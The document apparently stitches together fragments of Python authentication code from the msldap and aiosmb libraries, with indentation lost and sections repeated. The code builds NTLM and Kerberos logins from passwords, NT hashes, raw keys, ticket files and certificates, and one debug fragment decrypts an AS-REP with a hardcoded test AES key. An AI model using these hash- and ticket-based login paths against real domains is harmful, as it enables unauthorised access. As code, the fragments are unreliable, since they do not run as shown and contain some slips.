elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_RC4:
kc.kerberos_key_rc4 = self.creds.password
kcred.enctypes = [23]
elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_CCACHE:
kcred.enctypes = [23, 17, 18] # TODO: fix this
elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_KEYTAB:
kc.keytab = self.creds.password
kcred.enctypes = [23, 17, 18] # TODO: fix this
elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_KIRBI:
kcred.enctypes = [23, 17, 18] # TODO: fix this
elif self.creds.auth_method in [
LDAPAuthProtocol.KERBEROS_PFX,
LDAPAuthProtocol.KERBEROS_CERTSTORE,
LDAPAuthProtocol.KERBEROS_PEM
]:
kcred.enctypes = [17, 18]
else:
raise Exception(
'No suitable secret type found to set up kerberos!')
if self.creds.etypes is not None:
kcred.enctypes = list(
set(self.creds.etypes).intersection(set(kcred.enctypes)))
kcred.ccred = kc
kcred.spn = KerberosSPN.from_target_string(
self.target.to_target_string())
kcred.target = KerberosTarget(self.target.dc_ip)
kcred.encrypt = self.creds.encrypt
if self.target.proxy is not None:
kcred.target.proxy = KerberosProxy()
kcred.target.proxy.type = self.target.proxy.type
kcred.target.proxy.target = copy.deepcopy(
self.target.proxy.target)
kcred.target.proxy.target[-1].endpoint_ip = self.target.dc_ip
kcred.target.proxy.target[-1].endpoint_port = 88
handler = MSLDAPKerberos(kcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5', handler)
return spneg
elif self.creds.auth_method == LDAPAuthProtocol.SSPI_KERBEROS:
if self.target is None:
raise Exception('Target must be specified with Kerberos SSPI!')
kerbcred = MSLDAPKerberosSSPICredential()
kerbcred.username = self.creds.domain if self.creds.domain is not None else '<CURRENT>'
kerbcred.username = self.creds.username if self.creds.username is not None else '<CURRENT>'
kerbcred.password = self.creds.password if self.creds.password is not None else '<CURRENT>'
kerbcred.spn = self.target.to_target_string()
kerbcred.encrypt = self.creds.encrypt
handler = MSLDAPKerberosSSPI(kerbcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5', handler)
return spneg
elif self.creds.auth_method == LDAPAuthProtocol.SSPI_NTLM:
ntlmcred = MSLDAPNTLMSSPICredential()
ntlmcred.username = self.creds.domain if self.creds.domain is not None else '<CURRENT>'
ntlmcred.username = self.creds.username if self.creds.username is not None else '<CURRENT>'
ntlmcred.password = self.creds.password if self.creds.password is not None else '<CURRENT>'
ntlmcred.encrypt = self.creds.encrypt
handler = MSLDAPNTLMSSPI(ntlmcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context(
'NTLMSSP - Microsoft NTLM Security Support Provider', handler)
return spneg
elif self.creds.auth_method.value.startswith('MULTIPLEXOR'):
if self.creds.auth_method in [
LDAPAuthProtocol.MULTIPLEXOR_SSL_NTLM,
LDAPAuthProtocol.MULTIPLEXOR_NTLM
]:
from msldap.authentication.ntlm.multiplexor import MSLDAPNTLMMultiplexor
ntlmcred = MSLDAPMultiplexorCredential()
ntlmcred.type = 'NTLM'
if self.creds.username is not None:
ntlmcred.username = '******'
if self.creds.domain is not None:
ntlmcred.domain = '<CURRENT>'
if self.creds.password is not None:
ntlmcred.password = '******'
ntlmcred.is_guest = False
ntlmcred.is_ssl = True if self.creds.auth_method == LDAPAuthProtocol.MULTIPLEXOR_SSL_NTLM else False
ntlmcred.parse_settings(self.creds.settings)
ntlmcred.encrypt = self.creds.encrypt
handler = MSLDAPNTLMMultiplexor(ntlmcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context(
'NTLMSSP - Microsoft NTLM Security Support Provider',
handler)
return spneg
elif self.creds.auth_method in [
LDAPAuthProtocol.MULTIPLEXOR_SSL_KERBEROS,
LDAPAuthProtocol.MULTIPLEXOR_KERBEROS
]:
from msldap.authentication.kerberos.multiplexor import MSLDAPKerberosMultiplexor
ntlmcred = MSLDAPMultiplexorCredential()
ntlmcred.type = 'KERBEROS'
ntlmcred.target = self.target
if self.creds.username is not None:
ntlmcred.username = '******'
if self.creds.domain is not None:
ntlmcred.domain = '<CURRENT>'
if self.creds.password is not None:
ntlmcred.password = '******'
ntlmcred.is_guest = False
ntlmcred.is_ssl = True if self.creds.auth_method == LDAPAuthProtocol.MULTIPLEXOR_SSL_NTLM else False
ntlmcred.parse_settings(self.creds.settings)
ntlmcred.encrypt = self.creds.encrypt
handler = MSLDAPKerberosMultiplexor(ntlmcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5',
handler)
return spneg
elif self.creds.auth_method.value.startswith('SSPIPROXY'):
if self.creds.auth_method == LDAPAuthProtocol.SSPIPROXY_NTLM:
from msldap.authentication.ntlm.sspiproxy import MSLDAPSSPIProxyNTLMAuth
ntlmcred = MSLDAPSSPIProxyCredential()
ntlmcred.type = 'NTLM'
if self.creds.username is not None:
ntlmcred.username = '******'
if self.creds.domain is not None:
ntlmcred.domain = '<CURRENT>'
if self.creds.password is not None:
ntlmcred.password = '******'
ntlmcred.is_guest = False
ntlmcred.encrypt = self.creds.encrypt
ntlmcred.host = self.creds.settings['host'][0]
ntlmcred.port = int(self.creds.settings['port'][0])
ntlmcred.proto = 'ws'
if 'proto' in self.creds.settings:
ntlmcred.proto = self.creds.settings['proto'][0]
if 'agentid' in self.creds.settings:
ntlmcred.agent_id = bytes.fromhex(
self.creds.settings['agentid'][0])
handler = MSLDAPSSPIProxyNTLMAuth(ntlmcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context(
'NTLMSSP - Microsoft NTLM Security Support Provider',
handler)
return spneg
elif self.creds.auth_method == LDAPAuthProtocol.SSPIPROXY_KERBEROS:
from msldap.authentication.kerberos.sspiproxyws import MSLDAPSSPIProxyKerberosAuth
ntlmcred = MSLDAPSSPIProxyCredential()
ntlmcred.type = 'KERBEROS'
ntlmcred.target = self.target
if self.creds.username is not None:
ntlmcred.username = '******'
if self.creds.domain is not None:
ntlmcred.domain = '<CURRENT>'
if self.creds.password is not None:
ntlmcred.password = '******'
ntlmcred.is_guest = False
ntlmcred.encrypt = self.creds.encrypt
ntlmcred.host = self.creds.settings['host'][0]
ntlmcred.port = self.creds.settings['port'][0]
ntlmcred.proto = 'ws'
if 'proto' in self.creds.settings:
ntlmcred.proto = self.creds.settings['proto'][0]
if 'agentid' in self.creds.settings:
ntlmcred.agent_id = bytes.fromhex(
self.creds.settings['agentid'][0])
handler = MSLDAPSSPIProxyKerberosAuth(ntlmcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5',
handler)
return spneg
elif self.creds.auth_method.value.startswith('WSNET'):
if self.creds.auth_method in [LDAPAuthProtocol.WSNET_NTLM]:
from msldap.authentication.ntlm.wsnet import MSLDAPWSNetNTLMAuth
ntlmcred = MSLDAPWSNETCredential()
ntlmcred.type = 'NTLM'
if self.creds.username is not None:
ntlmcred.username = '******'
if self.creds.domain is not None:
ntlmcred.domain = '<CURRENT>'
if self.creds.password is not None:
ntlmcred.password = '******'
ntlmcred.is_guest = False
handler = MSLDAPWSNetNTLMAuth(ntlmcred)
spneg = SPNEGO()
spneg.add_auth_context(
'NTLMSSP - Microsoft NTLM Security Support Provider',
handler)
return spneg
elif self.creds.auth_method in [LDAPAuthProtocol.WSNET_KERBEROS]:
from msldap.authentication.kerberos.wsnet import MSLDAPWSNetKerberosAuth
ntlmcred = MSLDAPWSNETCredential()
ntlmcred.type = 'KERBEROS'
ntlmcred.target = self.target
if self.creds.username is not None:
ntlmcred.username = '******'
if self.creds.domain is not None:
ntlmcred.domain = '<CURRENT>'
if self.creds.password is not None:
ntlmcred.password = '******'
ntlmcred.is_guest = False
handler = MSLDAPWSNetKerberosAuth(ntlmcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5',
handler)
return spneg
def to_spnego_cred(creds, target=None):
if creds.authentication_type == SMBAuthProtocol.NTLM:
ntlmcred = SMBNTLMCredential()
ntlmcred.username = creds.username
ntlmcred.domain = creds.domain if creds.domain is not None else ''
ntlmcred.workstation = None
ntlmcred.is_guest = False
if creds.secret is None:
raise Exception('NTLM authentication requres password!')
if creds.secret_type == SMBCredentialsSecretType.NT:
ntlmcred.nt_hash = creds.secret
elif creds.secret_type == SMBCredentialsSecretType.PASSWORD:
ntlmcred.password = creds.secret
settings = NTLMHandlerSettings(ntlmcred)
handler = NTLMAUTHHandler(settings)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context(
'NTLMSSP - Microsoft NTLM Security Support Provider', handler)
return spneg
elif creds.authentication_type == SMBAuthProtocol.KERBEROS:
if target is None:
raise Exception('Target must be specified with Kerberos!')
if target.hostname is None:
raise Exception(
'target must have a domain name or hostname for kerberos!')
if target.dc_ip is None:
raise Exception('target must have a dc_ip for kerberos!')
kc = KerberosCredential()
kc.username = creds.username
kc.domain = creds.domain
if creds.secret_type == SMBCredentialsSecretType.PASSWORD:
kc.password = creds.secret
elif creds.secret_type == SMBCredentialsSecretType.NT:
kc.nt_hash = creds.secret
elif creds.secret_type == SMBCredentialsSecretType.AES:
if len(creds.secret) == 32:
kc.kerberos_key_aes_128 = creds.secret
elif len(creds.secret) == 64:
kc.kerberos_key_aes_256 = creds.secret
elif creds.secret_type == SMBCredentialsSecretType.RC4:
kc.kerberos_key_rc4 = creds.secret
elif creds.secret_type == SMBCredentialsSecretType.RC4:
kc.ccache = creds.secret
else:
raise Exception(
'No suitable secret type found to set up kerberos!')
kcred = SMBKerberosCredential()
kcred.ccred = kc
kcred.spn = KerberosSPN.from_target_string(
target.to_target_string())
kcred.target = KerberosTarget(target.dc_ip)
if target.proxy is not None:
kcred.target.proxy = KerberosProxy()
kcred.target.proxy.target = copy.deepcopy(target.proxy.target)
kcred.target.proxy.target.endpoint_ip = target.dc_ip
kcred.target.proxy.target.endpoint_port = 88
kcred.target.proxy.creds = copy.deepcopy(target.proxy.auth)
handler = SMBKerberos(kcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5', handler)
return spneg
elif creds.authentication_type == SMBAuthProtocol.SSPI_KERBEROS:
if target is None:
raise Exception('Target must be specified with Kerberos SSPI!')
kerbcred = SMBKerberosSSPICredential()
kerbcred.client = None #creds.username #here we could submit the domain as well for impersonation? TODO!
kerbcred.password = creds.secret
kerbcred.target = target.to_target_string()
handler = SMBKerberosSSPI(kerbcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5', handler)
return spneg
elif creds.authentication_type == SMBAuthProtocol.SSPI_NTLM:
ntlmcred = SMBNTLMSSPICredential()
ntlmcred.client = creds.username #here we could submit the domain as well for impersonation? TODO!
ntlmcred.password = creds.secret
handler = SMBNTLMSSPI(ntlmcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context(
'NTLMSSP - Microsoft NTLM Security Support Provider', handler)
return spneg
elif creds.authentication_type.value.startswith('MULTIPLEXOR'):
if creds.authentication_type in [
SMBAuthProtocol.MULTIPLEXOR_SSL_NTLM,
SMBAuthProtocol.MULTIPLEXOR_NTLM
]:
from aiosmb.authentication.ntlm.multiplexor import SMBNTLMMultiplexor
ntlmcred = SMBMultiplexorCredential()
ntlmcred.type = 'NTLM'
if creds.username is not None:
ntlmcred.username = '******'
if creds.domain is not None:
ntlmcred.domain = '<CURRENT>'
if creds.secret is not None:
ntlmcred.password = '******'
ntlmcred.is_guest = False
ntlmcred.is_ssl = True if creds.authentication_type == SMBAuthProtocol.MULTIPLEXOR_SSL_NTLM else False
ntlmcred.parse_settings(creds.settings)
handler = SMBNTLMMultiplexor(ntlmcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context(
'NTLMSSP - Microsoft NTLM Security Support Provider',
handler)
return spneg
elif creds.authentication_type in [
SMBAuthProtocol.MULTIPLEXOR_SSL_KERBEROS,
SMBAuthProtocol.MULTIPLEXOR_KERBEROS
]:
from aiosmb.authentication.kerberos.multiplexor import SMBKerberosMultiplexor
ntlmcred = SMBMultiplexorCredential()
ntlmcred.type = 'KERBEROS'
ntlmcred.target = creds.target
if creds.username is not None:
ntlmcred.username = '******'
if creds.domain is not None:
ntlmcred.domain = '<CURRENT>'
if creds.secret is not None:
ntlmcred.password = '******'
ntlmcred.is_guest = False
ntlmcred.is_ssl = True if creds.authentication_type == SMBAuthProtocol.MULTIPLEXOR_SSL_NTLM else False
ntlmcred.parse_settings(creds.settings)
handler = SMBKerberosMultiplexor(ntlmcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5',
handler)
return spneg
print('============= ERROR E-DATA =======================')
# if error is KDC_ERR_PREAUTH_REQUIRED then e-data might contain info. this info is
kerr_1_edata_native = METHOD_DATA.load(kerr_1_native['e-data']).native
pprint(kerr_1_edata_native)
asreq_2_native = KDC_REQ.load(asreq_2).native
pprint(asreq_2_native)
#print('aaa')
#pprint(asreq_2_native['padata'][0]['padata-value'])
asrep_4_native = KerberosResponse.load(asrep_4).native
pprint(asrep_4_native)
cred = KerberosCredential()
cred.username = '******'
cred.domain = 'TEST.corp'
#cred.password = '******'
cred.kerberos_key_aes_256 = '7289306c73ca8909cf89bc01afe3e29f26211f89d922fb317cc5d81cfdf8465d'
supp_enc = EncryptionType.AES256_CTS_HMAC_SHA1_96
cipherText = asrep_4_native['enc-part']['cipher']
print(cipherText.hex())
key_bytes = cred.get_key_for_enctype(supp_enc, None)
kerberos_key = Key(_enctype_table[asrep_4_native['enc-part']['etype']].enctype, key_bytes)
temp = _enctype_table[asrep_4_native['enc-part']['etype']].decrypt(kerberos_key, 3, cipherText)
temp_dec = EncASRepPart.load(temp).native
pprint(temp_dec)
def get_kerberos_cred(self):
stype = None
dbstype = self.stype.upper()
if dbstype in ['PW', 'PASSWORD', 'PASS']:
kc = KerberosCredential()
kc.domain = self.domain
kc.username = self.username
kc.add_secret(KerberosSecretType.PASSWORD, self.secret)
return kc
elif dbstype in ['RC4', 'NT']:
kc = KerberosCredential()
kc.domain = self.domain
kc.username = self.username
kc.add_secret(KerberosSecretType.RC4, self.secret)
return kc
elif dbstype in ['AES', 'AES128', 'AES256']:
kc = KerberosCredential()
kc.domain = self.domain
kc.username = self.username
kc.add_secret(KerberosSecretType.AES, self.secret)
return kc
elif dbstype in ['KEYTAB']:
kc = KerberosCredential.from_keytab(self.secret)
kc.domain = self.domain
kc.username = self.username
return kc
elif dbstype in ['KIRBI']:
kc = KerberosCredential.from_kirbi(self.secret)
return kc
if stype is None:
raise Exception('Couldnt figure out correct stype for customcred!')
def to_spnego_cred(creds, target=None):
if creds.authentication_type == SMBAuthProtocol.NEGOEX:
with_certstrore = creds.secret_type == SMBCredentialsSecretType.CERTSTORE
settings = SPNEGOEXAuthHandlerSettings(
creds.username,
creds.secret,
target,
dh_params=None,
with_certstrore=with_certstrore)
handler = SPNEGOEXAuthHandler(settings)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context(
'NEGOEX - SPNEGO Extended Negotiation Security Mechanism',
handler)
return spneg
elif creds.authentication_type == SMBAuthProtocol.NTLM:
ntlmcred = SMBNTLMCredential()
ntlmcred.username = creds.username
ntlmcred.domain = creds.domain if creds.domain is not None else ''
ntlmcred.workstation = None
ntlmcred.is_guest = False
if creds.secret is None:
if creds.username is None and creds.domain is None:
ntlmcred.is_guest = True
else:
raise Exception('NTLM authentication requres password!')
if creds.secret_type == SMBCredentialsSecretType.NT:
ntlmcred.nt_hash = creds.secret
elif creds.secret_type == SMBCredentialsSecretType.PASSWORD:
ntlmcred.password = creds.secret
settings = NTLMHandlerSettings(ntlmcred)
handler = NTLMAUTHHandler(settings)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context(
'NTLMSSP - Microsoft NTLM Security Support Provider', handler)
return spneg
elif creds.authentication_type == SMBAuthProtocol.KERBEROS:
if target is None:
raise Exception('Target must be specified with Kerberos!')
if target.hostname is None:
raise Exception(
'target must have a domain name or hostname for kerberos!')
if target.dc_ip is None:
raise Exception('target must have a dc_ip for kerberos!')
if creds.secret_type == SMBCredentialsSecretType.KEYTAB:
filename = creds.secret
if creds.secret.upper() == 'ENV':
filename = os.environ['KRB5KEYTAB']
kc = KerberosCredential.from_keytab(filename, creds.username,
creds.domain)
elif creds.secret_type == SMBCredentialsSecretType.CCACHE:
filename = creds.secret
if creds.secret.upper() == 'ENV':
try:
filename = os.environ['KRB5CCACHE']
except:
raise Exception(
'Kerberos auth missing environment variable KRB5CCACHE'
)
kc = KerberosCredential.from_ccache_file(filename)
kc.username = creds.username
kc.domain = creds.domain
elif creds.secret_type == SMBCredentialsSecretType.KIRBI:
filename = creds.secret
kc = KerberosCredential.from_kirbi(filename)
kc.username = creds.username
kc.domain = creds.domain
elif creds.secret_type == SMBCredentialsSecretType.PFX:
kc = KerberosCredential.from_pfx_file(creds.username,
creds.secret,
username=creds.altname,
domain=creds.altdomain)
creds.username = kc.username
creds.domain = kc.domain
target.domain = kc.domain
elif creds.secret_type == SMBCredentialsSecretType.PFXSTR:
kc = KerberosCredential.from_pfx_string(creds.username,
creds.secret,
username=creds.altname,
domain=creds.altdomain)
creds.username = kc.username
creds.domain = kc.domain
target.domain = kc.domain
elif creds.secret_type == SMBCredentialsSecretType.PEM:
kc = KerberosCredential.from_pem_file(creds.username,
creds.secret,
username=creds.altname,
domain=creds.altdomain)
creds.username = kc.username
creds.domain = kc.domain
target.domain = kc.domain
elif creds.secret_type == SMBCredentialsSecretType.CERTSTORE:
# username is the CN of the certificate
# secret is the name of the certstore, default: MY
certstore = creds.secret
if creds.secret is None:
certstore = 'MY'
kc = KerberosCredential.from_windows_certstore(
creds.username,
certstore,
username=creds.altname,
domain=creds.altdomain)
creds.username = kc.username
creds.domain = kc.domain
target.domain = kc.domain
else:
kc = KerberosCredential()
kc.username = creds.username
kc.domain = creds.domain
if creds.secret_type == SMBCredentialsSecretType.PASSWORD:
kc.password = creds.secret
elif creds.secret_type == SMBCredentialsSecretType.NT:
kc.nt_hash = creds.secret
elif creds.secret_type == SMBCredentialsSecretType.AES:
if len(creds.secret) == 32:
kc.kerberos_key_aes_128 = creds.secret
elif len(creds.secret) == 64:
kc.kerberos_key_aes_256 = creds.secret
elif creds.secret_type == SMBCredentialsSecretType.RC4:
kc.kerberos_key_rc4 = creds.secret
if kc is None:
raise Exception(
'No suitable secret type found to set up kerberos!')
kcred = SMBKerberosCredential()
kcred.ccred = kc
kcred.spn = KerberosSPN.from_target_string(
target.to_target_string())
if target.proxy is not None:
if target.proxy.type in [
SMBProxyType.WSNET, SMBProxyType.SOCKS5,
SMBProxyType.SOCKS5_SSL, SMBProxyType.SOCKS4,
SMBProxyType.SOCKS4_SSL
]:
kcred.target = KerberosTarget(target.dc_ip)
kcred.target.proxy = KerberosProxy()
kcred.target.proxy.target = copy.deepcopy(
target.proxy.target)
kcred.target.proxy.target[-1].endpoint_ip = target.dc_ip
kcred.target.proxy.target[-1].endpoint_port = 88
elif target.proxy.type in [
SMBProxyType.MULTIPLEXOR, SMBProxyType.MULTIPLEXOR_SSL
]:
kcred.target = KerberosTarget(target.dc_ip)
kcred.target.proxy = copy.deepcopy(target.proxy)
else:
kcred.target = KerberosTarget(target.dc_ip)
handler = SMBKerberos(kcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5', handler)
return spneg
elif creds.authentication_type == SMBAuthProtocol.SSPI_KERBEROS:
if target is None:
raise Exception('Target must be specified with Kerberos SSPI!')
kerbcred = SMBKerberosSSPICredential()
kerbcred.client = None #creds.username #here we could submit the domain as well for impersonation? TODO!
kerbcred.password = creds.secret
kerbcred.target = target.to_target_string()
handler = SMBKerberosSSPI(kerbcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5', handler)
return spneg
elif creds.authentication_type == SMBAuthProtocol.SSPI_NTLM:
ntlmcred = SMBNTLMSSPICredential()
ntlmcred.client = creds.username #here we could submit the domain as well for impersonation? TODO!
ntlmcred.password = creds.secret
handler = SMBNTLMSSPI(ntlmcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context(
'NTLMSSP - Microsoft NTLM Security Support Provider', handler)
return spneg
elif creds.authentication_type.value.startswith('MPN'):
if creds.authentication_type in [
SMBAuthProtocol.MPN_SSL_NTLM, SMBAuthProtocol.MPN_NTLM
]:
from aiosmb.authentication.ntlm.mpn import SMBNTLMMPN
ntlmcred = SMBMPNCredential()
ntlmcred.type = 'NTLM'
ntlmcred.is_ssl = True if creds.authentication_type == SMBAuthProtocol.MPN_SSL_NTLM else False
ntlmcred.parse_settings(creds.settings)
handler = SMBNTLMMPN(ntlmcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context(
'NTLMSSP - Microsoft NTLM Security Support Provider',
handler)
return spneg
elif creds.authentication_type in [
SMBAuthProtocol.MPN_SSL_KERBEROS,
SMBAuthProtocol.MPN_KERBEROS
]:
from aiosmb.authentication.kerberos.mpn import SMBKerberosMPN
ntlmcred = SMBMPNCredential()
ntlmcred.type = 'KERBEROS'
ntlmcred.target = creds.target
if creds.username is not None:
ntlmcred.username = '******'
if creds.domain is not None:
ntlmcred.domain = '<CURRENT>'
if creds.secret is not None:
ntlmcred.password = '******'
ntlmcred.is_guest = False
ntlmcred.is_ssl = True if creds.authentication_type == SMBAuthProtocol.MPN_SSL_KERBEROS else False
ntlmcred.parse_settings(creds.settings)
handler = SMBKerberosMPN(ntlmcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5',
handler)
return spneg
elif creds.authentication_type.value.startswith('MULTIPLEXOR'):
if creds.authentication_type in [
SMBAuthProtocol.MULTIPLEXOR_SSL_NTLM,
SMBAuthProtocol.MULTIPLEXOR_NTLM
]:
from aiosmb.authentication.ntlm.multiplexor import SMBNTLMMultiplexor
ntlmcred = SMBMultiplexorCredential()
ntlmcred.type = 'NTLM'
if creds.username is not None:
ntlmcred.username = '******'
if creds.domain is not None:
ntlmcred.domain = '<CURRENT>'
if creds.secret is not None:
ntlmcred.password = '******'
ntlmcred.is_guest = False
ntlmcred.is_ssl = True if creds.authentication_type == SMBAuthProtocol.MULTIPLEXOR_SSL_NTLM else False
ntlmcred.parse_settings(creds.settings)
handler = SMBNTLMMultiplexor(ntlmcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context(
'NTLMSSP - Microsoft NTLM Security Support Provider',
handler)
return spneg
elif creds.authentication_type in [
SMBAuthProtocol.MULTIPLEXOR_SSL_KERBEROS,
SMBAuthProtocol.MULTIPLEXOR_KERBEROS
]:
from aiosmb.authentication.kerberos.multiplexor import SMBKerberosMultiplexor
ntlmcred = SMBMultiplexorCredential()
ntlmcred.type = 'KERBEROS'
ntlmcred.target = creds.target
if creds.username is not None:
ntlmcred.username = '******'
if creds.domain is not None:
ntlmcred.domain = '<CURRENT>'
if creds.secret is not None:
ntlmcred.password = '******'
ntlmcred.is_guest = False
ntlmcred.is_ssl = True if creds.authentication_type == SMBAuthProtocol.MULTIPLEXOR_SSL_NTLM else False
ntlmcred.parse_settings(creds.settings)
handler = SMBKerberosMultiplexor(ntlmcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5',
handler)
return spneg
elif creds.authentication_type.value.startswith('WSNET'):
if creds.authentication_type in [SMBAuthProtocol.WSNET_NTLM]:
from aiosmb.authentication.ntlm.wsnet import SMBWSNetNTLMAuth
ntlmcred = SMBWSNETCredential()
ntlmcred.type = 'NTLM'
if creds.username is not None:
ntlmcred.username = '******'
if creds.domain is not None:
ntlmcred.domain = '<CURRENT>'
if creds.secret is not None:
ntlmcred.password = '******'
ntlmcred.is_guest = False
handler = SMBWSNetNTLMAuth(ntlmcred)
spneg = SPNEGO()
spneg.add_auth_context(
'NTLMSSP - Microsoft NTLM Security Support Provider',
handler)
return spneg
elif creds.authentication_type in [SMBAuthProtocol.WSNET_KERBEROS]:
from aiosmb.authentication.kerberos.wsnet import SMBWSNetKerberosAuth
ntlmcred = SMBWSNETCredential()
ntlmcred.type = 'KERBEROS'
ntlmcred.target = creds.target
if creds.username is not None:
ntlmcred.username = '******'
if creds.domain is not None:
ntlmcred.domain = '<CURRENT>'
if creds.secret is not None:
ntlmcred.password = '******'
ntlmcred.is_guest = False
handler = SMBWSNetKerberosAuth(ntlmcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5',
handler)
return spneg
elif creds.authentication_type.value.startswith('SSPIPROXY'):
if creds.authentication_type == SMBAuthProtocol.SSPIPROXY_NTLM:
from aiosmb.authentication.ntlm.sspiproxy import SMBSSPIProxyNTLMAuth
ntlmcred = SMBSSPIProxyCredential()
ntlmcred.type = 'NTLM'
if creds.username is not None:
ntlmcred.username = '******'
if creds.domain is not None:
ntlmcred.domain = '<CURRENT>'
if creds.secret is not None:
ntlmcred.password = '******'
ntlmcred.is_guest = False
ntlmcred.host = creds.settings['host'][0]
ntlmcred.port = int(creds.settings['port'][0])
ntlmcred.proto = 'ws'
if 'proto' in creds.settings:
ntlmcred.proto = creds.settings['proto'][0]
if 'agentid' in creds.settings:
ntlmcred.agent_id = bytes.fromhex(
creds.settings['agentid'][0])
handler = SMBSSPIProxyNTLMAuth(ntlmcred)
spneg = SPNEGO()
spneg.add_auth_context(
'NTLMSSP - Microsoft NTLM Security Support Provider',
handler)
return spneg
elif creds.authentication_type == SMBAuthProtocol.SSPIPROXY_KERBEROS:
from aiosmb.authentication.kerberos.sspiproxy import SMBSSPIProxyKerberosAuth
ntlmcred = SMBSSPIProxyCredential()
ntlmcred.type = 'KERBEROS'
ntlmcred.target = creds.target
if creds.username is not None:
ntlmcred.username = '******'
if creds.domain is not None:
ntlmcred.domain = '<CURRENT>'
if creds.secret is not None:
ntlmcred.password = '******'
ntlmcred.is_guest = False
ntlmcred.host = creds.settings['host'][0]
ntlmcred.port = int(creds.settings['port'][0])
ntlmcred.proto = 'ws'
if 'proto' in creds.settings:
ntlmcred.proto = creds.settings['proto'][0]
if 'agentid' in creds.settings:
ntlmcred.agent_id = bytes.fromhex(
creds.settings['agentid'][0])
handler = SMBSSPIProxyKerberosAuth(ntlmcred)
#setting up SPNEGO
spneg = SPNEGO()
spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5',
handler)
return spneg
